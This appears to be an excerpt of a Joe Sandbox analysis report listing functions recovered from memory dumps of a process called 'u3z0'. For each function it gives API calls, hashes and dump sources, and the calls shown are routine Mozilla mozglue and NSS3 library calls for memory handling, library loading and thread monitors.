                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99b0cd73042fba093567b1852f8cd75a8ad402912d4386f8c93d020192f3bf0e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F721F231B01502EFDF148BF8CE18E993375EB46335F444638E81597F40D720BA278AA6
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7AC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C7AC0E9), ref: 6C7AC418
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C7AC437
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C7AC0E9), ref: 6C7AC44C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-2623246514
                                                                                                                                                                                                                                                                                        • Opcode ID: c8dc79fda80a6251e35b4960adacbff02662bf3c5195d7983209aa40fc2897ee
                                                                                                                                                                                                                                                                                        • Instruction ID: 8e2c65bda336a0994c684772927a32948f4bf1b3c9775218f380f0c3cb1912a7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8dc79fda80a6251e35b4960adacbff02662bf3c5195d7983209aa40fc2897ee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89E0927460530BAFDB006F728A487117EFCA70AA05F004236BA0492600EBB1D6418A54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7A75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C7A748B,?), ref: 6C7A75B8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C7A75D7
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C7A748B,?), ref: 6C7A75EC
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-3641475894
                                                                                                                                                                                                                                                                                        • Opcode ID: 5853c57bb67d1a1f1cfaf887c971190999bd04ccf51689ec9b7c53eb0ff8c7ff
                                                                                                                                                                                                                                                                                        • Instruction ID: ce2e7b480e70b401d30fd5feda64bfa9b76e031141b52bc6c9a2ab93ea355c7c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5853c57bb67d1a1f1cfaf887c971190999bd04ccf51689ec9b7c53eb0ff8c7ff
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8EE092B2640307AFEB006BB2C9487057AFCEB07758F504135A905D2600EBB0D26A8F51
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7ABE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,?,?,6C7ABE49), ref: 6C7ABEC4
                                                                                                                                                                                                                                                                                        • RtlCaptureStackBackTrace.NTDLL ref: 6C7ABEDE
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C7ABE49), ref: 6C7ABF38
                                                                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL ref: 6C7ABF83
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(6C7ABE49,00000000), ref: 6C7ABFA6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2764315370-0
                                                                                                                                                                                                                                                                                        • Opcode ID: dc808ff0f4cc9866960d73273519c1b11c497a4b748e46d1f1883ff68fe2f059
                                                                                                                                                                                                                                                                                        • Instruction ID: 8adcc39e338eb7596b3a7deffa06fdf8f88c5d1a71a02bc319e3688f592c075f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc808ff0f4cc9866960d73273519c1b11c497a4b748e46d1f1883ff68fe2f059
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95516271A002098FE714CFA9CE80B9AB7A6FF89314F298639D555A7B55D730F9078B80
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C744DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C744E5A
                                                                                                                                                                                                                                                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C744E97
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C744EE9
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C744F02
                                                                                                                                                                                                                                                                                        • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C744F1E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 713647276-0
                                                                                                                                                                                                                                                                                        • Opcode ID: bc9ec20eb2b9fe04fac9afa1aebb04fdb8e28e726573333197d063bb0afbc3f4
                                                                                                                                                                                                                                                                                        • Instruction ID: 0e05828829d7c92b5d02fea5262cbee31eb467c3377f1837cf49ad8fe14082f5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc9ec20eb2b9fe04fac9afa1aebb04fdb8e28e726573333197d063bb0afbc3f4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD41DE716087059FC701CF29C98095BB7E8BF8A344F14CA2DF96697B41DB30E958EB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C751530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(-00000002,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C75159C
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C7515BC
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(-00000001,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C7515E7
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C751606
                                                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C75152B,?,?,?,?,6C751248,?), ref: 6C751637
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 733145618-0
                                                                                                                                                                                                                                                                                        • Opcode ID: acc5c5b71ed7c09814360470b47f203a203f233a69361036a71fad54d2c76d76
                                                                                                                                                                                                                                                                                        • Instruction ID: 00323db2e438b86139106da5cdab825b8d2b443b2a4a2d49e44bedc68afb5435
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acc5c5b71ed7c09814360470b47f203a203f233a69361036a71fad54d2c76d76
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A310872A001048BCB188E78DA5446E77A9FB853657A50B2DE823DBBD5EF30D9248792
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7AAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAD9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AADAC
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAE01
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAE1D
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C7BE330,?,6C76C059), ref: 6C7AAE3D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3161513745-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4f060cd4d6137cca0490e643277be09b282c8cb38e4c7b422b31cefb8c5e2264
                                                                                                                                                                                                                                                                                        • Instruction ID: 990dea73faedc9b79131d0ada17ead00cfbb0d4039988b9f5127165fe4853b37
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f060cd4d6137cca0490e643277be09b282c8cb38e4c7b422b31cefb8c5e2264
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 273164B1A002159FDB50DF758D49AABBBF8EF48665F15843DE84AE7700E734E804CBA0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C74B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C74B532
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C74B55B
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C74B56B
                                                                                                                                                                                                                                                                                        • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C74B57E
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C74B58F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4244350000-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 30571d260b2982965dd7e59bcbae652ff3c0a3ac12621fad83fdf918e14dcb40
                                                                                                                                                                                                                                                                                        • Instruction ID: 22254ae42119247e42bf6a595f2b61e7190ace362655f507cfb4f8db7806a84a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30571d260b2982965dd7e59bcbae652ff3c0a3ac12621fad83fdf918e14dcb40
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A921D271A006059BDB009F69CD44BAEFBB9FF46304F288039E8189B341E735ED11C7A0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7A6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C7A6E78
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7A6A10: InitializeCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6A68
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7A6A10: GetCurrentProcess.KERNEL32 ref: 6C7A6A7D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7A6A10: GetCurrentProcess.KERNEL32 ref: 6C7A6AA1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7A6A10: EnterCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6AAE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7A6AE1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7A6B15
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C7A6B65
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7A6A10: LeaveCriticalSection.KERNEL32(6C7CF618,?,?), ref: 6C7A6B83
                                                                                                                                                                                                                                                                                        • MozFormatCodeAddress.MOZGLUE ref: 6C7A6EC1
                                                                                                                                                                                                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C7A6EE1
                                                                                                                                                                                                                                                                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C7A6EED
                                                                                                                                                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C7A6EFF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4058739482-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1e88bb323eba81ab1b0790ac41fa32e406858827575a59c036123fcb1f6b8126
                                                                                                                                                                                                                                                                                        • Instruction ID: 2c3936fcf83be2e472029d35556f422f7a55620001d8b76dfdbc0e96530bd827
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e88bb323eba81ab1b0790ac41fa32e406858827575a59c036123fcb1f6b8126
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C21A4B1A0421A9FDF10CF69D9896DA77F9FF88308F044139E84997341DB70AA598F92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8F2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8F5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C8F5B56
                                                                                                                                                                                                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8F2CEC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C90C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C90C2BF
                                                                                                                                                                                                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C8F2D02
                                                                                                                                                                                                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C8F2D1F
                                                                                                                                                                                                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C8F2D42
                                                                                                                                                                                                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C8F2D5B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                        • Instruction ID: bda344ae4e96b6378d29179f5d14e23d43e8b98fdc62f0634982f3b704650d4c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D701CCB19102445BE7309E29FC40BC7B7A5EF55359F014925E4A986710E63AF41687A2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C780D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C743DEF), ref: 6C780D71
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C743DEF), ref: 6C780D84
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C743DEF), ref: 6C780DAF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Virtual$Free$Alloc
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                        • API String ID: 1852963964-2186867486
                                                                                                                                                                                                                                                                                        • Opcode ID: 55831268facfa6aaf7356d8501009de5fb009be69eb6debf907c1415a284fb0c
                                                                                                                                                                                                                                                                                        • Instruction ID: 4b11ac8d2ce61f927313fb866c0faee50631fae5f50efa66310b0dbf588e0726
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55831268facfa6aaf7356d8501009de5fb009be69eb6debf907c1415a284fb0c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21F089313876962BE62011665E0BF6A265D6BC2B65F348135F704DAEC0DA54F40446B6
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C792CF0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 160COMMON
